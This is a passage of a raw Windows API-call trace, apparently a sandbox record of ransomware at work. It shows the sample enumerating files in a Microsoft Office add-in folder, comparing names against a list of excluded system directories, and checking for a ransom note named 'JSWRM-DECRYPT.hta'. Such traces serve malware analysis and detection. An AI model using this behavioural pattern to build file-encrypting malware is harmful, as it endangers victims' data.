(lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0125.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0125.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0125.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0125.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0125.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0125.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0125.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0125.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0125.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0125.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245200 | out: hHeap=0x1e0000) returned 1 [0125.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.815] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf311d3eb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf311d3eb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf311d3eb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15aa8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0125.815] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0125.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0125.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0125.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20dde8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0125.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0125.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0125.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0125.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0125.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d770, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0125.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0125.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0125.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0125.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0125.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.816] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc51578a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc51578a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc646a83, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0125.816] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0125.816] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0125.816] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0125.816] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0125.816] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0125.816] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0125.816] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0125.816] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.816] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0125.816] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0125.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0125.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0125.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d800, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0125.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0125.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0125.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f280 [0125.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0125.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0125.816] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf71003, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xfe368d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4640, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0125.817] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0125.817] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0125.817] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0125.817] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0125.817] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0125.817] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0125.817] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0125.817] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.817] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0125.817] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0125.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0125.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0125.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d728, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0125.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0125.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0125.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0125.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dba8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0125.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0125.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e340 [0125.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0125.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0125.817] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x48f5cfa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x48f5cfa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48f5cfa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0125.817] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0125.817] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0125.817] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0125.817] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0125.817] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0125.817] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0125.817] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0125.817] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.817] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0125.817] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0125.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0125.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0125.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0125.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0125.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0125.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0125.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0125.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0125.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0125.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0125.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.818] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ac3289, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ac3289, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x28a8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0125.818] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0125.818] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0125.818] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0125.818] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0125.818] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0125.818] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0125.818] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0125.818] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.818] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0125.818] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0125.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0125.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0125.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0125.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0125.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0125.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0125.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.819] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ac3289, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ac3289, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x28a8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0125.819] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0125.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0125.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0125.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0125.819] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6296213, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16605845, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16605845, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0125.819] lstrcmpiW (lpString1="ca", lpString2=".") returned 1 [0125.819] lstrcmpiW (lpString1="ca", lpString2="..") returned 1 [0125.819] lstrcmpiW (lpString1="ca", lpString2="...") returned 1 [0125.819] lstrcmpiW (lpString1="ca", lpString2="windows") returned -1 [0125.819] lstrcmpiW (lpString1="ca", lpString2="recovery") returned -1 [0125.819] lstrcmpiW (lpString1="ca", lpString2="perflogs") returned -1 [0125.819] lstrcmpiW (lpString1="ca", lpString2="documents and settings") returned -1 [0125.819] lstrcmpiW (lpString1="ca", lpString2="$RECYCLE.BIN") returned 1 [0125.819] lstrcmpiW (lpString1="ca", lpString2="system volume information") returned -1 [0125.819] lstrcmpiW (lpString1="ca", lpString2="msocache") returned -1 [0125.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0125.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0125.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0125.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0125.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0125.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0125.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ca\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ca\\jswrm-decrypt.hta")) returned 0xffffffff [0125.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0125.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", 